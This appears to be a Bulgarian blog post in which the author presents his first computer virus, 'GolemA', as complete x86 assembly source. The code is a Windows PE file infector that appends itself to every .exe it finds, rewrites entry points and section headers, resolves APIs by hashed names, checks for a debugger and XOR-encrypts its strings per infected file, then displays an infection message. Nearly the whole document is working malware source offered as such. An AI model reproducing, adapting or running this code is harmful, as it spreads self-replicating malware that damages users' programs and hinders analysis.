Радостен съм да представя първият ми вирус GolemA. Кръстих го така защото според мене е много голям и тромав :Д
; BlindWolf / F7F
;This is my first virii, nothing special just Appender.... infect all files in the directory and all sub-directorys.
;Uses CRC instead of API names and keep API addresses in MMX registers.
;Use PEB to check if debugger present, and if debugger detected EIP cannot access memory :P.
;Use Xor encryption to encrypt the strings, the key is unique for every infected file.
.686p
.mmx
.MODEL flat,stdcall
OPTION CASEMAP:NONE
Include windows.inc
assume fs:FLAT
.code
mark dw 0F7F0h
mylabel label near
xorkey db ?
dllname db "user32.dll",0
payload db "File Infected By F7F/Win32.GolemA!",0
encryption label near
FindData WIN32_FIND_DATA
FileInformation BY_HANDLE_FILE_INFORMATION
FileHandle HANDLE ?
FileType db "*.exe",0
ImageBase dd ?
EntryPoint dd ?
NewEP dd ?
BytesWritten dd ?
NumberOfSections dw ?
FileSize dd ?
AddressOfFileMap dd ?
VirtualSize dd ?
VirtualAddress dd ?
OpenFileHandle dd ?
SizeOfRawData dd ?
RawOffset dd ?
LastSectionOff dd ?
beforeep label near
start:
push ebp
mov ebp,esp
pop eax
xor eax,eax
jmp realstart ;jump to the body of the virus
GetKernel proc ;This procedure returns image base of the kernel32.dll (ESI ) and address of kernel32 export table (EDI)
tryagain:
cmp word ptr[esi],'ZM'
jnz tryitman
push esi
add esi,dword ptr[esi+3ch]
add esi,78h
mov edi,dword ptr[esi]
pop esi
add edi,esi
Ret
tryitman:
sub esi,1000h
jmp tryagain
GetKernel EndP
GetApis proc ;This procedure takes 4 arguments 1: EAX = 0 , 2:ESI = Imagebase , 3:EDI = export table address , 4:EBX == CRC for the name of the API
mov ecx,[edi+18h]
mov edx,[edi+20h]
add edx,esi
push ecx
push esi
push edi
mov edi,esi
mov esi,[edx]
add esi,edi
lol:
xor edi,edi
loop1:
lodsb
mov ecx,eax
add edi,eax
rol edi,cl
test eax,eax
jne loop1
cmp edi,ebx
je found
dec dword ptr[esp+08h]
jne lol
found:
pop ebx
pop eax
pop ecx
mov edx,[ebx+18h]
mov edi,[ebx+24h]
add edi,eax
sub edx,ecx
shl edx,1
add edi,edx
movzx edx,word ptr[edi]
mov ebx,[ebx+1ch]
add ebx,eax
shl edx,2
add ebx,edx
xor ecx,ecx
add ecx,[ebx]
add ecx,eax
xor eax,eax
Ret
GetApis EndP ;This procedure return ECX = address of the desired API
realstart:
call getDelta ;Get the delta
getDelta:
pop ebp
sub ebp,offset getDelta
call CheckForDebugger
lea eax,[mylabel+ebp]
cmp word ptr[eax-2],0F7F0h
jz readytoexe ;Is it dropper or infected file ?
;int 3
lea ebx,[ebp+encryption]
dec ebx
lea eax,[ebp+xorkey]
mov cl,[ebp+xorkey]
decryptmore:
inc eax
xor byte ptr[eax],cl
cmp eax,ebx ;decrypt the strings
jnz decryptmore
jmp preparetoexe
readytoexe:
pop esi
and esi,0FFFF0000h
call GetKernel
push edi
push esi
xor eax,eax
mov ebx,1EF99B0Dh ;CRC for CreateFileMappingA
call GetApis
movd mm4,ecx ;mm4 = CreateFileMappingA
pop esi
pop edi
mov ebx,0BD01EEDEh
push edi
push esi
xor eax,eax
call GetApis
movd mm7,ecx
pop esi
pop edi
mov ebx,13B13649h
push edi
push esi
xor eax,eax
call GetApis
movd mm6,ecx
pop esi
pop edi
mov ebx,53F2D79Bh ;CRC for MapViewOfFileA
push edi
push esi
xor eax,eax
call GetApis
movd mm5,ecx ;mm5 = MapViewOfFileA
pop esi
pop edi
push edi ;EDI = export table address
push esi ;ESI = kernel32 imagebase
mov ebx,02BD833FBh ;CRC for CreateFileA
xor eax,eax
call GetApis
movd mm3,ecx ;mm3 = CreateFileA
pop esi
pop edi
push edi
push esi
mov ebx,0A38B216Eh ;CRC for FindNextFileA
xor eax,eax
call GetApis
movd mm2,ecx ;mm2 = FindNextFileA
pop esi
pop edi
push edi
push esi
xor eax,eax
mov ebx,0903ebb2eh ;CRC for FindFirstFileA
call GetApis
lea ebx,[ebp+FindData]
lea edx,[ebp+FileType]
push ebx
push edx
call ecx ;calling FindFirstFileA
mov [ebp+FileHandle],eax ;Save the file handle
mov ebx,0ECF95325h ;CRC for GetFileAttributesA
pop esi
pop edi
xor eax,eax
push edi
push esi
call GetApis
movd mm0,ecx ;mm0 = GetFileAttributesA
xor eax,eax
pop esi
pop edi
push edi
push esi
mov ebx,0F2290C25h ;CRC for SetFileAttributesA
call GetApis
movd mm1,ecx ;mm1 = SetFileAttributesA
check:
movd ecx,mm0
lea ebx,[FindData+2Ch+ebp] ;FindData+2Ch+EBP = file name returned by FindFirstFileA
push ebx
call ecx ;calling GetFileAttributesA
cmp eax,04h ;check if file attributes are system (0x04)
jne StartInfection
OneMoreInfection:
movd ecx,mm2
lea ebx,[FindData+ebp]
push ebx
mov eax,[ebp+FileHandle]
push eax
call ecx ;calling FindNextFileA
test eax,eax
jz PayLoad
jmp check
StartInfection:
movd ecx,mm1
lea edx,[FindData+2Ch+ebp]
mov ebx,04h ;later may move this furthur
push ebx
push edx
call ecx ;calling SetFileAttributesA to set file attributes to 0x04 (system file)
movd ecx,mm3
lea ebx,[FindData+2Ch+ebp]
push 0h
push 4h
push 3h
push 0h
push FILE_SHARE_READ+FILE_SHARE_WRITE
push GENERIC_READ+GENERIC_WRITE
push ebx
call ecx ;calling CreateFileA
mov [OpenFileHandle+ebp],eax
push eax
push 0h
push eax
movd ecx,mm6
call ecx ;calling GetFileSizeA
add eax,other - mylabel
mov [ebp+FileSize],eax
mov edx,eax
pop eax
lea ebx,[FindData+2Ch+ebp]
push ebx
push edx
push 0h
push PAGE_READWRITE
push 0h
push eax
movd ecx,mm4
call ecx ;Calling CreateFileMappingA
mov edx,[FileSize+ebp]
push edx
push 0h
push 0h
push FILE_MAP_ALL_ACCESS
push eax
movd ecx,mm5
call ecx ;calling MapViewOfFile
mov [AddressOfFileMap+ebp],eax
push eax
add eax,3Ch ;get the magic jump
mov eax,dword ptr[eax] ;get the magic jump
pop ecx
add eax,ecx
add eax,6h
xor ecx,ecx
mov cx,word ptr[eax] ;get NumberOfSections
mov [NumberOfSections+ebp],cx
add eax,22h
mov ecx,dword ptr[eax] ;get address of entry point
mov [ebp+EntryPoint],ecx
add eax,0Ch
mov ecx,dword ptr[eax] ;get the imagebase
mov [ImageBase+ebp],ecx
add eax,1Ch
mov [ebp+OpenFileHandle],eax ;offset of sizeOfiMAGE
sub eax,50h ;back to value of magic jump
push eax
add eax,0F8h ;go to the end of PE header
xor ecx,ecx
mov cx,[NumberOfSections+ebp]
dec cx
mov ebx,28h
imul ecx,ebx ;get beginning of last PE section
add eax,ecx ;normalize the offset
mov [ebp+LastSectionOff],eax
add eax,0Ch ;skip section name and virtual size to get virtual address
mov ecx,dword ptr[eax]
mov [VirtualAddress+ebp],ecx
sub eax,4
mov ecx,dword ptr[eax]
mov [ebp+VirtualSize],ecx
add dword ptr[eax],other - mylabel ;write virtualsize
mov [ebp+SizeOfRawData],eax ;virtual size offset
add eax,0Ch
mov ecx,dword ptr[eax]
mov [ebp+RawOffset],ecx ;raw offset
jmp justMissThis
modifyRawSize:
sub eax,ecx
xchg eax,ecx
mov eax,[ebp+SizeOfRawData] ;offset of virtual size
sub dword ptr [eax],other - mylabel
mov edx,[ebp+OpenFileHandle] ;sizeofimage
sub dword ptr [edx],ecx ;modify size of image
sub dword ptr[edx],other - mylabel
push eax ;offset of virtual size
mov eax,dword ptr[eax]
xor edx,edx
mov ecx,200h
div ecx
inc eax
mul ecx
pop ebx
add ebx,8
mov ecx,dword ptr[ebx]
push eax
sub eax,ecx ;new raw size - old raw size
sub eax,other - mylabel
xchg eax,ecx
pop eax
sub eax,ecx
mov [ebp+SizeOfRawData],eax ;number of garbage bytess
mov dword ptr[ebx],eax ;write SizeOfRawData
jmp afterModifyRawSize
CheckForDebugger proc
mov esi,808h
add ebx,2h
cmp byte ptr[ebx],0h
jnz Debugged
add ebx,66h
cmp byte ptr[ebx],0h
jnz Debugged
sub ebx,50h
mov ebx,dword ptr[ebx]
add ebx,10h
cmp dword ptr[ebx],eax
jz NotDebugged
Debugged:
xor esi,777h
push esi
Ret
NotDebugged:
Ret
CheckForDebugger EndP
justMissThis:
mov eax,[ebp+AddressOfFileMap]
add eax,[FileSize+ebp]
sub eax,other - mylabel
xor esi,esi
jmp backonebyte+1h
backonebyte:
dec eax
inc esi
cmp dword ptr[eax],00h
je backonebyte
;int 3
push eax
xor ecx,ecx
mov cl,al
sub eax,ecx ;get random key for the xor encryption
mov cl,byte ptr[eax]
mov [ebp+xorkey],cl
pop eax
inc eax
sub esi,2h
push eax
sub eax,[ebp+AddressOfFileMap]
sub eax,[ebp+RawOffset]
add eax,[ebp+VirtualAddress]
add eax,[ebp+ImageBase]
add eax,beforeep - mylabel
mov [ebp+NewEP],eax
pop eax
push eax
lea edx,[ebp+other]
lea ecx,[ebp+mylabel]
write:
mov bl,byte ptr[ecx]
mov byte ptr[eax],bl
inc ecx
inc eax
cmp ecx,edx
jnz write
;int 3
push eax
push ebx
sub eax,other - mylabel
mov ebx,eax
add ebx,encryption - mylabel
mov cl,[ebp+xorkey]
encryptmore:
inc eax
xor byte ptr[eax],cl
cmp eax,ebx ;encrypt the strings
jnz encryptmore
pop ebx
pop eax
mov ecx,[ebp+FileSize]
sub ecx,other - mylabel
add ecx,[ebp+AddressOfFileMap]
cmp eax,ecx
jle dontModifyRawSize
jmp modifyRawSize
dontModifyRawSize:
mov edx,[ebp+OpenFileHandle] ;sizeofimage
add dword ptr [edx],other - mylabel ;modify size of image
afterModifyRawSize:
mov eax,[ebp+LastSectionOff]
add eax,24h
mov dword ptr[eax],0E00000E0h
mov eax,[ebp+AddressOfFileMap]
push eax
add eax,3Ch
mov eax,dword ptr[eax]
pop edx
add eax,edx
add eax,28h
mov ecx,[ebp+NewEP]
sub ecx,[ebp+ImageBase]
mov dword ptr[eax],ecx
pop edx
pop eax
push edx
savetofile:
pop edx
sub edx,[ebp+AddressOfFileMap]
add edx,other - mylabel
mov ecx,[ebp+AddressOfFileMap]
push edx
push ecx
movd ecx,mm7
call ecx
jmp OneMoreInfection
readyforEP:
igotoEP db 6 dup(?)
;int 3
preparetoexe:
;prepare to execute the main program
jmp letsgotoEP
itsdone:
jmp readytoexe
letsgotoEP:
lea ecx,[ebp+igotoEP]
mov byte ptr[ecx],68h
add ecx,1h
mov eax,[ebp+EntryPoint]
add eax,[ebp+ImageBase]
mov dword ptr[ecx],eax
add ecx,4h
mov byte ptr[ecx],0C3h
jmp itsdone
PayLoad:
pop esi ;ImageBase of kernel32
pop edi ;export table of kernel32
mov ebx,0A216A185h ;LoadLibrary
xor eax,eax
call GetApis
lea eax,[ebp+dllname]
push eax
call ecx ;load user32.dll
xchg esi,eax
call GetKernel
mov ebx,9A9C4525h
xor eax,eax
call GetApis ;get messagebox addr
lea eax,[ebp+payload]
xor ebx,ebx
push MB_ICONERROR
push 0h
push eax
push 0h
call ecx ; call messagebox
jmp readyforEP
other label near
end start
Няма коментари:
Публикуване на коментар